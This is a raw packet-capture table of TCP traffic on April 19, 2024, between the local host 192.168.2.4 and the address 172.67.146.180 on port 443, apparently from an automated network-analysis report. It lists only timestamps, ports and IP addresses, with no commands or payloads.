Apr 19, 2024 07:35:59.434089899 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.434118986 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.434138060 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.435340881 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.435360909 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.435408115 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.435420990 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.435446024 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.435472012 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.437347889 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.437369108 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.437427044 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.437439919 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.437465906 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.437485933 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.465122938 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.465143919 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.465276957 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.465338945 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.465409040 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.475626945 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.475672960 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.475725889 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.475744009 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.475784063 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.475812912 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.477196932 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.477217913 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.477267027 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.477279902 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.477307081 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.477335930 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.478851080 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.478871107 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.478924036 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.478943110 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.478965044 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.479001045 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.480629921 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.480654001 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.480715990 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.480731010 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.480784893 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.482423067 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.482445002 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.482497931 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.482511997 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.482537031 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.482575893 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.484162092 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.484183073 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.484241962 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.484257936 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.484313965 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.486315966 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.486336946 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.486390114 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.486404896 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.486429930 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.486449957 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.488114119 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.488132954 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.488179922 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.488193989 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.488219976 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.488241911 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.489824057 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.489845991 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.489912033 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.489924908 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.489975929 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.489975929 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.492389917 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.492410898 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.492486000 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.492500067 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.492558956 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.493798018 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.493818998 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.493866920 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.493880987 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.493906975 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.493928909 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.495522976 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.495541096 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.495587111 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.495605946 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.495626926 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.495652914 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.497303963 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.497323036 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.497366905 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.497380018 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.497406960 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.497423887 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.499738932 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.499758959 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.499815941 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.499835968 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.499856949 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.499891996 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.501549006 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.501569033 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.501621962 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.501636028 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.501660109 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.501693964 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.502942085 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.502962112 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.503005981 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.503017902 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.503043890 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.503067017 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.505538940 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.505561113 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.505621910 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.505635023 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.505660057 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.505678892 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.507271051 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.507291079 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.507340908 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.507354021 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.507380962 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.507430077 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.509048939 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.509069920 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.509124041 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.509136915 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.509162903 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.509191990 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.510749102 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.510768890 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.510819912 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.510833025 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.510859013 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.510885954 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.513021946 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.513044119 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.513094902 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.513108015 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.513134003 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.513154030 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.514681101 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.514700890 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.514749050 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.514767885 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.514790058 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.514821053 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.516341925 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.516362906 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.516417027 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.516434908 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.516458035 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.516478062 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.518207073 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.518225908 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.518289089 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.518304110 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.518354893 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.519979954 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.520001888 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.520047903 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.520062923 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.520097017 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.520116091 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.521056890 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.521076918 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.521120071 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.521133900 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.521157980 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.521178007 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.522810936 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.522830963 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.522908926 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.522926092 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.522952080 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.522974014 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.524637938 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.524698019 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.524733067 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.524749041 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.524774075 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.524796963 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.526354074 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.526375055 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.526433945 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.526448965 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.526474953 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.526494026 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.528188944 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.528209925 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.528259993 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.528274059 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.528300047 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.528316975 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.529251099 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.529274940 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.529316902 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.529331923 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.529357910 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.529380083 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.530951977 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.530970097 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.531012058 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.531028032 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.531054020 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.531070948 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.532633066 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.532654047 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.532710075 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.532726049 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.532749891 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.532768965 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.534406900 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.534427881 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.534482002 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.534496069 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.534521103 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.534540892 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.536042929 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.536063910 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.536127090 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.536143064 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.536168098 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.536185980 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.537240982 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.537261009 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.537308931 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.537322998 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.537347078 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.537365913 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.538810968 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.538830996 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.538877964 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.538891077 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.538916111 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.538940907 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.539733887 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.539755106 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.539802074 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.539813995 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.539839029 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.539859056 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.541513920 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.541534901 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.541588068 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.541601896 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.541635036 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.541661024 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.542402029 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.542421103 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.542476892 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.542489052 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.542516947 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.542538881 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.544086933 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.544116974 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.544172049 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.544184923 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.544209957 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.544234037 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.545010090 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.545031071 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.545080900 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.545094013 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.545118093 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.545137882 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.545934916 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.545955896 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.545998096 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.546010017 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.546034098 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.546068907 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.547858953 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.547880888 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.547924995 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.547938108 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.547961950 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.547983885 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.548860073 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.548882961 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.548926115 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.548938990 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.548963070 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.548998117 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.549912930 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.549932957 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.549979925 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.549997091 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.550019026 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.550040960 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.550978899 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.551000118 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.551100016 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.551114082 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.551177025 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.552829027 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.552849054 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.552901030 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.552913904 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.552937984 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.552962065 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.553749084 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.553769112 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.553812981 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.553831100 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.553838968 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.553889990 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.554846048 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.554881096 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.554913998 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.554929018 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.554955959 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.554972887 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.556727886 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.556749105 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.556819916 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.556834936 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.556885958 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.557641983 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.557662010 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.557717085 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.557729006 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.557754993 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.557780027 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.558732986 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.558757067 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.558803082 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.558815002 CEST	443	49731	172.67.146.180	192.168.2.4
Apr 19, 2024 07:35:59.558837891 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.558860064 CEST	49731	443	192.168.2.4	172.67.146.180
Apr 19, 2024 07:35:59.559752941 CEST	443	49731	172.67.146.180	192.168.2.4
